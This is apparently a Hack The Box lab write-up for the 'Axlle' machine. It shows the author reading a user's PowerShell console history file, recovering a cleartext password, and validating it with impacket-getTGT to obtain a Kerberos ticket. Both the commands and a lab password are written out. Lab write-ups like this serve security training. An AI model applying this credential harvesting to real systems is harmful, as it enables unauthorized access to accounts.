InfoSec LAB

Axlle_Console_History_dallon.matrix

Created: 1 min read

Console History

Checking for user’s home directory upon gaining a PowerShell session as the dallon.matrix user

PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft> cat Windows\PowerSHell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object
System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);

A CLEARTEXT credential for the dallon.matrix user is exposed on PowerShell command history. PJsO1du$CVJ#D is the password

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/dallon.matrix@mainframe.axlle.htb' -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: PJsO1du$CVJ#D
[*] Saving ticket in dallon.matrix@mainframe.axlle.htb.ccache

Validated. TGT generated for the dallon.matrix user

Interactive Graph View

Backlinks